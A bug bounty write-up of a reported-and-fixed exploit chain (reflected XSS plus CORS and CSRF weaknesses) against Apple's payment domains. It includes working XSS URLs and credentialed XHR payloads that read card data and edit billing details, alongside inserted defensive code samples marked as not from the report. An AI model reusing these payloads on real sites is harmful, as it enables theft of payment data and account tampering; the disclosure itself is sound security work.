Apple - Steal Payment Data and Full access to payment actions of any Apple Account in multiple services By Chaining CORS and XSS [7500$]

Company Information : 

Apple Inc. is an American multinational technology company headquartered in Cupertino, California. As of March 2023, Apple is the world's biggest company by market capitalization, and with US$394.3 billion the largest technology company by 2022 revenue.


Bug Category : 
Cross-origin resource sharing (CORS) :
Cross-origin resource sharing (CORS) is a mechanism that allows restricted resources on a web page to be accessed from another domain outside the domain from which the first resource was served. A web page may freely embed cross-origin images, stylesheets, scripts, iframes, and videos.


Stored Cross-site-scripting (XSS) :
Cross-site scripting (XSS) is an attack in which an attacker injects malicious executable scripts into the code of a trusted application or website. Attackers often initiate an XSS attack by sending a malicious link to a user and enticing the user to click it.


## Impact :

I am mentioning a few examples below.

1. Access to payment data such as credit card and billing address.

2. Add/edit/delete credit cards and billing/shipping addresses.

3. Force the user to buy a subscription.

4. Cancel the user's current subscriptions.




Target Information :

https://music.apple.com

https://tv.apple.com 

https://iTunes.apple.com

https://podcastsconnect.apple.com

https://buy.*.apple.com 

https://buy.music.apple.com

https://buy.tv.apple.com

https://buy.itunes.apple.com

https://buy.podcastsconnect.apple.com



Technical Details of the Bug : 

1. Reflected XSS on https://itunes.apple.com

I found a reflected XSS on https://itunes.apple.com. The POC is mentioned below.

POC : 

https://itunes.apple.com/essentials?id="><svg/onload=alert(document.domain)>

https://itunes.apple.com/essentials?id="><svg/onload=alert(document.cookie)>

I am also attaching a screenshot. 

[Screenshot attached: Screenshot 2021-06-06 at 12.12.31 PM.png]
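A defensive counterpart to the payload above, added here as an example and not code from the report or from Apple: it shows why `"><svg/onload=...` breaks out of a quoted attribute and how encoding the reflected `id` value for the attribute context neutralises it. The `data-id` template, the function names and the regression check are constructed assumptions; the report does not describe the real reflection point on itunes.apple.com.

```javascript
// Added example, not Apple's code and not from the report. The template below
// is a constructed stand-in for a page that reflects the `id` query parameter
// into an HTML attribute, which is the context the "><svg payload targets.

// Encode the characters that can close a quoted attribute or open a tag.
// Encoding only '"' is not enough for unquoted or single-quoted attributes,
// so '<', '>', '&' and "'" are covered as well.
function escapeHtmlAttr(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Vulnerable rendering (constructed): the query value is concatenated straight
// into a quoted attribute, so a value that starts with "> closes the attribute
// and the tag, and everything after it is parsed as new markup.
function renderEssentialsVulnerable(id) {
  return `<div class="essentials" data-id="${id}"></div>`;
}

// Hardened rendering: the same template, with the value encoded for the
// attribute context before it is inserted.
function renderEssentialsSafe(id) {
  return `<div class="essentials" data-id="${escapeHtmlAttr(id)}"></div>`;
}

// Cheap regression check for templates that reflect user input: does the
// rendered HTML contain any tag other than the template's own <div>?
function containsInjectedTag(html) {
  const tags = html.match(/<\/?([a-zA-Z][\w-]*)/g) || [];
  return tags.some((tag) => !/^<\/?div$/i.test(tag));
}

// The payload from the report, used as the test input.
const PAYLOAD = '"><svg/onload=alert(document.domain)>';

// Walk-through: the vulnerable template gains an <svg> element, the hardened
// one keeps the payload inside the attribute value as text.
function walkthrough() {
  return {
    vulnerable: containsInjectedTag(renderEssentialsVulnerable(PAYLOAD)),
    hardened: containsInjectedTag(renderEssentialsSafe(PAYLOAD)),
  };
}

console.log(walkthrough());
```

The check is deliberately narrow: it only asserts that no unexpected tag appears, which is the property the reflected payload violates. Context-aware encoding at the point of output is the fix; stripping `<script>` or filtering `alert` would leave the `"><svg/onload=` pattern intact.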




2. CORS Misconfiguration :

When we access domains such as music.apple.com, tv.apple.com, itunes.apple.com and podcastsconnect.apple.com, all payment-related data and actions are handled in the background by one of the domains mentioned below.

Vulnerable Domain :

buy.music.apple.com

buy.tv.apple.com

buy.itunes.apple.com

buy.podcastsconnect.apple.com

All of the domains above behave the same way; only the domain name differs according to where it is used.

Ex :

For payments on tv.apple.com, the domain used is buy.tv.apple.com.



There is a CORS implementation on all https://buy.*.apple.com domains.

The CORS policy is strict: no domain outside apple.com is allowed, and not every subdomain of apple.com is allowed either.

After testing, I found the domains below are allowed:

*.music.apple.com

*.tv.apple.com

Apart from that, I found that https://itunes.apple.com is allowed as a valid origin, and a user can make GET/POST requests from https://itunes.apple.com.


POC :

1. Log in to https://music.apple.com and go to Settings.

2. Capture the background traffic in a proxy tool.

3. You will notice requests to the domain https://buy.music.apple.com.

4. Capture any request and send it to Repeater (e.g. in Burp Suite).

5. Add an Origin: https://itunes.apple.com header and run the request.

6. You will notice that the Origin is accepted and reflected back, together with an Access-Control-Allow-Credentials: true header.

The same applies on all of the domains mentioned below:

https://tv.apple.com

https://podcastsconnect.apple.com

[Screenshot attached: Screenshot 2021-06-06 at 12.40.22 PM.png]






CSRF on https://buy.*.apple.com :

https://buy.*.apple.com is not only used for data access; it is also used for many critical actions such as adding/editing credit cards or payment methods, buying a subscription and cancelling a subscription.

All POST requests are protected only by strict Origin header validation (explained above) and Content-Type header validation.

Hence, if we make requests from any valid origin, the CSRF protection is bypassed.




Chaining all Three Attacks :

As explained in each section above, https://itunes.apple.com is a valid origin for CORS on https://buy.*.apple.com.

Hence XSS on https://itunes.apple.com allows reading data from and making requests to https://buy.*.apple.com.

An attacker can therefore run malicious JavaScript on https://itunes.apple.com and access payment-related data and actions on https://buy.*.apple.com in the victim's account.
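To make the trust boundary of this chain concrete, here is an added example (not Apple's code and not from the report) that models the two checks the report says buy.*.apple.com applied to POST requests, an Origin allowlist and a Content-Type check, together with the defender's check from steps 5 and 6 of the CORS POC. The hostnames are the ones the report names; the POLICY object, the request shape, the endpoint path in the sample and all function names are constructed assumptions, and the wildcard entries *.music.apple.com / *.tv.apple.com are reduced to their apex origins for brevity.

```javascript
// Added example, not Apple's code and not from the report. It models the two
// server-side checks the report describes for POST requests on
// buy.*.apple.com (Origin allowlist + Content-Type) and a defender's audit of
// a CORS response. POLICY, sampleRequest() and the helper names are
// constructed for this example; the hostnames are the ones in the report.

// Credentialed CORS policy. Origins are compared as exact strings
// (scheme + host), never by suffix or regex. The report's wildcard labels are
// reduced to their apex origins here (assumption for brevity).
const POLICY = {
  allowedOrigins: new Set([
    'https://music.apple.com',
    'https://tv.apple.com',
    'https://itunes.apple.com', // the entry that links the XSS to the API
  ]),
  allowedContentTypes: new Set([
    'application/json',
    'application/x-www-form-urlencoded',
  ]),
};

// Response headers a strict server emits for a given Origin. Unknown origins
// get no Access-Control-Allow-Origin at all; Vary: Origin is always set so a
// cache never serves one origin's headers to another.
function corsHeadersFor(origin, policy) {
  if (!policy.allowedOrigins.has(origin)) {
    return { Vary: 'Origin' };
  }
  return {
    'Access-Control-Allow-Origin': origin,
    'Access-Control-Allow-Credentials': 'true',
    Vary: 'Origin',
  };
}

// The gate described under "CSRF on https://buy.*.apple.com": a
// state-changing request passes when its Origin is allowlisted and its
// Content-Type (parameters stripped) is one the API accepts.
function acceptsStateChangingRequest(req, policy) {
  const origin = req.headers.origin;
  const type = (req.headers['content-type'] || '')
    .split(';')[0].trim().toLowerCase();
  return policy.allowedOrigins.has(origin) && policy.allowedContentTypes.has(type);
}

// Steps 5 and 6 of the CORS POC as a function: given the Origin you sent and
// the response headers (any letter case), report whether that origin was
// granted credentialed read access.
function auditCorsResponse(sentOrigin, responseHeaders) {
  const h = {};
  for (const [k, v] of Object.entries(responseHeaders)) h[k.toLowerCase()] = v;
  const allowOrigin = h['access-control-allow-origin'];
  const credentials = String(h['access-control-allow-credentials'] || '').toLowerCase();
  return {
    originAccepted: allowOrigin === sentOrigin || allowOrigin === '*',
    // Browsers refuse '*' together with credentials, so only an exact echo
    // of the sent origin counts as credentialed read access.
    credentialedRead: allowOrigin === sentOrigin && credentials === 'true',
  };
}

// Every allowlisted origin is inside the trust boundary: script running in
// any of them (through XSS, for instance) passes the gate with the victim's
// cookies. This is the list to keep as short as possible.
function trustBoundary(policy) {
  return [...policy.allowedOrigins].sort();
}

// Copy of a policy with one origin removed, the kind of change that breaks
// the chain without touching the other origins.
function withoutOrigin(policy, origin) {
  const allowedOrigins = new Set(policy.allowedOrigins);
  allowedOrigins.delete(origin);
  return { ...policy, allowedOrigins };
}

// Constructed request shaped like the report's /account/information/sections
// call, as sent by a page running at `origin`.
function sampleRequest(origin) {
  return {
    method: 'POST',
    path: '/account/information/sections',
    headers: { origin, 'content-type': 'application/json' },
    body: '{"sections":["accountSummary","purchaseHistory"]}',
  };
}

// Walk-through: a request from the itunes origin passes both checks under
// POLICY and fails once that origin is removed from the allowlist.
function walkthrough() {
  const itunes = 'https://itunes.apple.com';
  const before = acceptsStateChangingRequest(sampleRequest(itunes), POLICY);
  const hardened = withoutOrigin(POLICY, itunes);
  const after = acceptsStateChangingRequest(sampleRequest(itunes), hardened);
  return { before, after, boundary: trustBoundary(hardened) };
}

console.log(walkthrough());
```

Removing an origin from the allowlist is what breaks the chain in this model; an XSS on any origin that remains listed still passes the gate, which is why a credentialed allowlist should hold only the origins that genuinely need to call the API, and why origin validation on its own is not a substitute for a per-session CSRF token on state-changing endpoints.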




## Steps to reproduce and POCs :

I am taking https://music.apple.com and https://buy.music.apple.com for POC purposes. You can also use https://tv.apple.com and https://podcastsconnect.apple.com to reproduce this issue.

How to capture the requests mentioned below :

1. Log in to https://music.apple.com and go to Settings.

2. Now check the background requests in Burp Suite or any other proxy tool.

I am going to mention a few requests, the AJAX code for the attack and direct POC URLs below.


Get Basic Payment and credit card info of any user :

Vulnerable HTTP request :

```
GET /account/stackable/paymentInfos HTTP/1.1
Host: buy.music.apple.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:87.0) Gecko/20100101 Firefox/87.0
Accept: */*
Accept-Language: en-gb
Accept-Encoding: gzip, deflate
Referer: https://music.apple.com/
content-type: application/json
x-apple-store-front: 143467-2,8
Origin: https://music.apple.com
Connection: close
Cookie: [cookies]
```


AJAX Request :

```
<script>
   // Credentialed cross-origin GET; the response is readable only because
   // the page's origin is on the buy.music.apple.com CORS allowlist.
   var xhttp = new XMLHttpRequest();
   xhttp.onreadystatechange = function() {
     if (this.readyState == 4 && this.status == 200) {
       alert(this.responseText);
     }
   };
   xhttp.open("GET", "https://buy.music.apple.com/account/stackable/paymentInfos", true);
   xhttp.withCredentials = true;
   xhttp.send();
</script>
```


URL Encoded POC URL :

https://itunes.apple.com/essentials?id=">%3Cscript%3E%0A%20%20%20var%20xhttp%20%3D%20new%20XMLHttpRequest()%3B%0A%20%20%20xhttp.onreadystatechange%20%3D%20function()%20%7B%0A%20%20%20%20%20if%20(this.readyState%20%3D%3D%204%20%26%26%20this.status%20%3D%3D%20200)%20%7B%0A%20%20%20alert(this.responseText)%3B%0A%20%20%20%20%20%7D%0A%20%20%20%7D%3B%0A%20%20%20xhttp.open(%22GET%22%2C%20%22https%3A%2F%2Fbuy.music.apple.com%2Faccount%2Fstackable%2FpaymentInfos%22%2C%20true)%3B%0A%20%20%20xhttp.withCredentials%20%3D%20true%3B%0A%20%20%20xhttp.send()%3B%0A%3C%2Fscript%3E




PII and Payment Details : 

Vulnerable HTTP request :

```
POST /account/information/sections HTTP/1.1
Host: buy.music.apple.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:87.0) Gecko/20100101 Firefox/87.0
Accept: */*
Accept-Language: en-gb
Accept-Encoding: gzip, deflate
Referer: https://music.apple.com/
content-type: application/json
x-apple-store-front: 143467-2,8
Origin: https://music.apple.com
Content-Length: 49
Connection: close
Cookie: [Cookies]

{"sections":["accountSummary","purchaseHistory"]}
```

AJAX Request :

```
<script>
   // Credentialed cross-origin POST with a JSON body; the Content-Type check
   // on the server passes because application/json is an accepted type.
   var xhttp = new XMLHttpRequest();
   xhttp.onreadystatechange = function() {
     if (this.readyState == 4 && this.status == 200) {
       alert(this.responseText);
     }
   };
   xhttp.open("POST", "https://buy.music.apple.com/account/information/sections", true);
   xhttp.setRequestHeader("Content-Type", "application/json");
   var data=JSON.stringify({"sections":["accountSummary","purchaseHistory","xCardBalance","accountAccess","iTunesInTheCloud","familySharing","computerAuthorizations","settings"]});
   xhttp.withCredentials = true;
   xhttp.send(data);
</script>
```

URL Encoded POC URL :

https://itunes.apple.com/essentials?id=">%3Cscript%3E%0A%20%20%20var%20xhttp%20%3D%20new%20XMLHttpRequest()%3B%0A%20%20%20xhttp.onreadystatechange%20%3D%20function()%20%7B%0A%20%20%20if%20(this.readyState%20%3D%3D%204%20%26%26%20this.status%20%3D%3D%20200)%20%7B%0A%20%20%20alert(this.responseText)%3B%0A%20%20%20%7D%0A%20%20%20%7D%3B%0A%20%20%20xhttp.open(%22POST%22%2C%20%22https%3A%2F%2Fbuy.music.apple.com%2Faccount%2Finformation%2Fsections%22%2C%20true)%3B%0A%20%20%20xhttp.setRequestHeader(%22Content-Type%22%2C%20%22application%2Fjson%22)%3B%0A%20%20%20var%20data%3DJSON.stringify(%7B%22sections%22%3A%5B%22accountSummary%22%2C%22purchaseHistory%22%2C%22xCardBalance%22%2C%22accountAccess%22%2C%22iTunesInTheCloud%22%2C%22familySharing%22%2C%22computerAuthorizations%22%2C%22settings%22%5D%7D)%3B%0A%20%20%20xhttp.withCredentials%20%3D%20true%3B%0A%20%20%20xhttp.send(data)%3B%0A%3C%2Fscript%3E



Vulnerable HTTP request :

```
GET /account/web/infoRefresh HTTP/1.1
Host: buy.music.apple.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:87.0) Gecko/20100101 Firefox/87.0
Accept: */*
Accept-Language: en-gb
Accept-Encoding: gzip, deflate
Referer: https://music.apple.com/
content-type: application/json
x-apple-store-front: 143467-2,8
Origin: https://music.apple.com
Connection: close
Cookie: [cookies]
```


AJAX Request :

```
<script>
   // Same credentialed GET pattern as above, against the infoRefresh endpoint.
   var xhttp = new XMLHttpRequest();
   xhttp.onreadystatechange = function() {
     if (this.readyState == 4 && this.status == 200) {
       alert(this.responseText);
     }
   };
   xhttp.open("GET", "https://buy.music.apple.com/account/web/infoRefresh", true);
   xhttp.withCredentials = true;
   xhttp.send();
</script>
```

URL Encoded POC URL :

https://itunes.apple.com/essentials?id=">%3Cscript%3E%0A%20%20%20%20var%20xhttp%20%3D%20new%20XMLHttpRequest()%3B%0A%20%20%20%20xhttp.onreadystatechange%20%3D%20function()%20%7B%0A%20%20%20%20%20%20if%20(this.readyState%20%3D%3D%204%20%26%26%20this.status%20%3D%3D%20200)%20%7B%0A%20%20%20alert(this.responseText)%3B%0A%20%20%20%20%20%20%7D%0A%20%20%20%20%7D%3B%0A%20%20%20%20xhttp.open(%22GET%22%2C%20%22https%3A%2F%2Fbuy.music.apple.com%2Faccount%2Fweb%2FinfoRefresh%22%2C%20true)%3B%0A%20%20%20%20xhttp.withCredentials%20%3D%20true%3B%0A%20%20%20%20xhttp.send()%3B%0A%3C%2Fscript%3E




Update credit card and Billing Details of any user :

Editing the payment card produces this request.

Vulnerable HTTP request :

```
POST /WebObjects/MZFinance.woa/wa/editBillingInfoSrv HTTP/1.1
Host: buy.music.apple.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:87.0) Gecko/20100101 Firefox/87.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://music.apple.com/
content-type: application/x-www-form-urlencoded;charset=UTF-8
Origin: https://music.apple.com
Content-Length: 679
Connection: close
Cookie: [cookies]

POST Parameters here
```


AJAX Request :

```
<script>
   // Credentialed cross-origin POST with a form-encoded body; this is the
   // state-changing request, so passing the Origin and Content-Type checks
   // here is what lets the billing details be changed.
   var xhttp = new XMLHttpRequest();
   xhttp.onreadystatechange = function() {
     if (this.readyState == 4 && this.status == 200) {
       alert(this.responseText);
     }
   };
   xhttp.open("POST", "https://buy.music.apple.com/WebObjects/MZFinance.woa/wa/editBillingInfoSrv", true);
   xhttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded;charset=UTF-8");
   var data="storefront=IND&billingFirstName=vijay&billingLastName=kumar&addressOfficialLineFirst=Hacked&addressOfficialLineSecond=Hacked&addressOfficialLineThird=Hacked&addressOfficialCity=Hacked&addressOfficialStateProvince=KA&addressOfficialPostalCode=560103&addressOfficialCountryCode=IND&phoneOfficeNumber=7229884843&paymentMethodType=CreditCard&creditCardNumber=%E2%80%A2%E2%80%A2%E2%80%A2%E2%80%A2%20%E2%80%A2%E2%80%A2%E2%80%A2%E2%80%A2%20%E2%80%A2%E2%80%A2%E2%80%A2%E2%80%A2%208774&creditCardExpirationMonth=%E2%80%A2%E2%80%A2&creditCardExpirationYear=%E2%80%A2%E2%80%A2%E2%80%A2%E2%80%A2&creditVerificationNumber=844&last4CCDigits=8774&creditCardType=Visa";
   xhttp.withCredentials = true;
   xhttp.send(data);
</script>
```


URL Encoded POC URL :

https://itunes.apple.com/essentials?id=">%3Cscript%3E%0A%20%20%20var%20xhttp%20%3D%20new%20XMLHttpRequest()%3B%0A%20%20%20xhttp.onreadystatechange%20%3D%20function()%20%7B%0A%20%20%20if%20(this.readyState%20%3D%3D%204%20%26%26%20this.status%20%3D%3D%20200)%20%7B%0A%20%20%20alert(this.responseText)%3B%0A%20%20%20%7D%0A%20%20%20%7D%3B%0A%20%20%20xhttp.open(%22POST%22%2C%20%22https%3A%2F%2Fbuy.music.apple.com%2FWebObjects%2FMZFinance.woa%2Fwa%2FeditBillingInfoSrv%22%2C%20true)%3B%0A%20%20%20xhttp.setRequestHeader(%22Content-Type%22%2C%20%22application%2Fx-www-form-urlencoded%3Bcharset%3DUTF-8%22)%3B%0A%20%20%20var%20data%3D%22storefront%3DIND%26billingFirstName%3Dvijay%26billingLastName%3Dkumar%26addressOfficialLineFirst%3DHacked%26addressOfficialLineSecond%3DHacked%26addressOfficialLineThird%3DHacked%26addressOfficialCity%3DHacked%26addressOfficialStateProvince%3DKA%26addressOfficialPostalCode%3D560103%26addressOfficialCountryCode%3DIND%26phoneOfficeNumber%3D7229884843%26paymentMethodType%3DCreditCard%26creditCardNumber%3D%25E2%2580%25A2%25E2%2580%25A2%25E2%2580%25A2%25E2%2580%25A2%2520%25E2%2580%25A2%25E2%2580%25A2%25E2%2580%25A2%25E2%2580%25A2%2520%25E2%2580%25A2%25E2%2580%25A2%25E2%2580%25A2%25E2%2580%25A2%25208774%26creditCardExpirationMonth%3D%25E2%2580%25A2%25E2%2580%25A2%26creditCardExpirationYear%3D%25E2%2580%25A2%25E2%2580%25A2%25E2%2580%25A2%25E2%2580%25A2%26creditVerificationNumber%3D844%26last4CCDigits%3D8774%26creditCardType%3DVisa%22%3B%0A%20%20%20xhttp.withCredentials%20%3D%20true%3B%0A%20%20%20xhttp.send(data)%3B%0A%3C%2Fscript%3E




# Video Proof of concept :

I am attaching a password-protected Vimeo video.

Link : https://vimeo.com/559574933

Password : h1test1110@





# Affected Services :

https://music.apple.com

https://tv.apple.com 

https://iTunes.apple.com

https://podcastsconnect.apple.com

https://buy.*.apple.com 

https://buy.music.apple.com

https://buy.tv.apple.com

https://buy.itunes.apple.com

https://buy.podcastsconnect.apple.com




Timeline : 



June 21st 2021 : Report sent to the Apple Product Security team by email.

June 21st 2021 : Report accepted and triaged.

June 22nd 2021 : Partial fix released to break the full chain.

Nov 14th 2021 : Complete issue resolved and confirmed.

Dec 06th 2021 : 7500$ bounty rewarded.
